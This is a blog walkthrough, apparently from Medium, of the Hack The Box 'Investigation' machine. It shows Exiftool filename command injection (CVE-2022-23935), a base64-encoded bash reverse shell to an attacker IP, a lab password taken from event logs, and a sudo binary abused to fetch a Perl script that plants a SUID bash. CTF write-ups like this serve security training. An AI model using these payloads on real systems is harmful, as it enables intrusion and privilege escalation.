Open in app

Sign in

Write

Sign in

HTB — Investigation

Niraj Kharel
8 min readApr 23, 2023

--

A detailed walkthrough for solving Investigation Box on Hack The Box. The box contains vulnerability like Command Injection on Exiftool, Credentials on Windows Event Logs for user and some reverse engineering for privilege escalation.

Enumeration

NMAP

nmap -sC -sV -oA nmap/10.10.11.197 10.10.11.197 -vv
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 2f:1e:63:06:aa:6e:bb:cc:0d:19:d4:15:26:74:c6:d9 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC8CUW+gkrjaTI+EeIVcW/8kCM0oaKxGk63NkzFaKj8cgPfImUg8NbMX7xSoQR2DJP88LCJWpm/7KgYyHgaI4w29TRZTGFrv1MKoALQKO/6GDUxLtoHaSA1KrXph74L9eNp/Q/xAzmjfNqLL3qCAotSUZndEWV7C7EQYj73e88Rvw+bV8mQ0O+habEygGVEFuEgOJpN0e3YM3EJoxo1N5CVJMBUJ4Jb7FoYYckIAYTZTV3fuembGRoG0Lvw6YbIOYA8URxLqcBxsMSOkznhf219fl2KXiT9Y7505L/HAeWG4NW4LAuDereMuaUDe4vWEMHYx0KH7m3UuJ7zxcPqHU7K94KW8cZVNlWjoNPDKrPTEgPDfDRlUNpVRyE87DcBgOzNGNFJHYhj2K46RKtv+TO9MjYKvC+nXFSNgPkdFaCQcfpqd61FtaVsin5Ho/v1XfhqDG0d7N7uDM28zCmNVfnl9+MI0jpBmiFaH8V0ZjR7EZlkk+7Xb3bI2Kq3KVaif7s=
|   256 27:45:20:ad:d2:fa:a7:3a:83:73:d9:7c:79:ab:f3:0b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBG5ZpYGYsM/eNsAOYy3iQ9O7/OdK6q63GKK1bd2ZA5qhePdO+KJOOvgwxKxBXoJApVfBKV0oVn3ztPubO2mdp5g=
|   256 42:45:eb:91:6e:21:02:06:17:b2:74:8b:c5:83:4f:e0 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJ4m4ta/VBtbCv+5FEPfydbXySZHyzU7ELt9lBsbjl5S
80/tcp open  http    syn-ack Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://eforenzics.htb/
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
Service Info: Host: eforenzics.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Add eforenzics.htb on /etc/hosts. Open http://eforenzics.htb/ on a web browser and view the application.

Directory Enumeration

The application seems to be the platform where we can perform the forensics of a images.

Click on the go button as shown on the image above, we will be forwarded to /service.html page. We can see that we are allowed to upload the jpg images and the detailed forensic analysis of the image is provided.

Let’s upload a random jpg image to view how the forensics is performed.

The image is uploaded successfully and the uploaded path is provided. Click on the link here as shown in the web page below.

We can find the application uses a tool called exiftool to dump the information of the jpg file.

The version of exiftool is called 12.37. Let’s see if the version is vulnerable. Exiftool 12.37 is vulnerable to command injection (CVE-2022–23935).

We can find more information about the vulnerability on https://gist.github.com/ert-plus/1414276e4cb5d56dd431c2f0429e4429

According to the vulnerability described on the below references, “Exiftool versions < 12.38 are vulnerable to Command Injection through a crafted filename. If the filename passed to exiftool ends with a pipe character | and exists on the filesystem, then the file will be treated as a pipe and executed as an OS command.”

Vulnerability Confirmation

Let’s confirm the vulnerability utilizing the ping command. If we receive the ICMP traffic in our attacker machine, we can confirm that the code injection vulnerability exists on the application and can proceed further for the reverse shell.

As described on the exploit https://github.com/dpbe32/CVE-2022-23935-PoC-Exploit/blob/main/exploit.sh, we need to encode the file name into base64.

The development of a payload would look like

mv index.jpeg "echo $(echo 'ping 10.10.14.14 -c4'|base64) | base64 -d |bash |"

Listen to the ICMP traffic from your attacker machine and upload the base64 encoded filename.

sudo tcpdump -i tun0 icmp

The image file gets uploaded, navigate to the hyperlink here.

As we receive the ICMP request from the box, we can confirm that the vulnerability exists on the application.

Exploitation

Perform Base64 encode to your bash reverse shell payload.

echo 'bash -i >& /dev/tcp/10.10.14.14/4444 0>&1'|base64

Rename the filename with a payload.

mv index.jpeg "echo 'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xNC80NDQ0IDA+JjEK'|base64 -d|bash |"

Listen to the port 4444 and upload the file.

nc -lvnp 4444

As soon as you hit the upload Botton, we can receive the reverse shell.

Escalation as a user

We need to escalate as a user smorton to get the user.txt file.

Download and run the linpeas.

Nothing interesting found from the linpeas.

Search for the files/directories which contains the name investigation. After all, this box is all about investigation. I found a directory /usr/local/investigation.

Navigate into that directory. We can see a log file called Windows Event Logs for Analysis.msg

Download the file into an attacker machine for an analysis.

The Windows Event Log is a log file which contains every incident or event occurring on the system. Let’s see if we could find any online decoder which could provide us more information about the file. I found an online file conversion for MSG file type. Upload and convert the document from using link.

https://www.zamzar.com/converters/document/msg/

Once converted, a security.evtx file is downloaded.

EVTX is a Windows Event Log File where the log are stored in a binary format and can be viewed with Windows Event Viewer application. The Security log records various types of events, including successful and unsuccessful logon attempts and activities related to resource management such as creating, opening, or removing files or other objects.

Since, I was on linux, I need to find another application which can parse the event data from the log.

Releases · omerbenamram/evtx

You can't perform that action at this time. You signed in with another tab or window. You signed out in another tab or…

github.com

The command tool developed by omerbenamram called evtx parses the value in different format XML, JSON and have binaries for different platform like Linux, MacOS.

Download the binary and rename it into evtx_dump. Make it an executable.

chmod +x evtx_dump

Parse the value and store it on a XML file.

./evtx_dump security.evtx > securityevents.xml

Viewing the log file, we can find a EventID. As per Microsoft docs, “Event identifiers uniquely identify a particular event. Each event source can define its own numbered events and the description strings to which they are mapped in its message file.” Therefore, there should be unique event ID for the defined events.

Analyzing the log file, there is an event where a user might have entered the password on username field while login.

We can get the list of username from the log file with a grep command. Some of the extracted usernames are: AAnderson
SMorton, Administrators, LJenkins, Administrator, AWright, BMay, EKora, HMarley, IPerez, JClark, KTyson, LMonroe.

But since we already know the user on the box which is smorton, SSH with the password Def@ultf0r3nz!csPa$$ for user smorton.

And the user flag is obtained.

Privilege Escalation

Looking at the sudo -l command, we can see that user smorton is allowed to run /usr/bin/binary as root.

Run the binary file with sudo command. It just exits the program.

On viewing the file type, we can see that the file is ELF 64-bit Binary executable. May be we need some analysis here.

Download the file into your local machine.

There is a tool called ELF Parser, which can be used to analyze the determine the capabilities of an ELF binary through static analysis.

Install the ELF Parser in your machine and open the binary file.

We can see that the binary has capabilities to open the file, close the file and execute the shell command as well. But no more information useful for us from this Parser.

It’s time to perform some reverse engineering using Ghidra. Open the binary file with Ghidra.

Double click on the binary file, the Ghidra tool will run.

We can find some decompiled source code here.

On viewing the source code, we can find that main function on the binary takes two parameters. Regarding the first parameter, if it does not contains 3 arguments, the program exits.

Also, if the program is run without SUDO permission, it exits. And Finally the program checks if the second parameter contains “lDnxUysaQn”. If not the program exits.

If those conditions are satisfied, the program opens the file lDnxUysaQn in a write binary wb mode, runs the CURL command for third argument in first parameter as a URL, and write the response of CURL command into the file lDnxUysaQn. And then it executes the file lDnxUysaQn with perl command and then finally deletes it.

Create a Perl Scrip which copy the /bin/bash into /tmp/bash and assign the SUID permission on it. cmd.pl

system("cp /bin/bash /tmp/bash; chmod +s /tmp/bash")

Host the script on your attacker machine.

python3 -m http.server 1337

Inside the box, run the binary file with below arguments.

sudo /usr/bin/binary <Attacker-IP>:1337/cmd.pl lDnxUysaQn

Run the copied bash file.

/tmp/bash -p

Here you go. Happy Hacking!

Htb
Hackthebox
Hackthebox Writeup

--

--

Niraj Kharel

Written by Niraj Kharel

51 Followers

Pentester

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams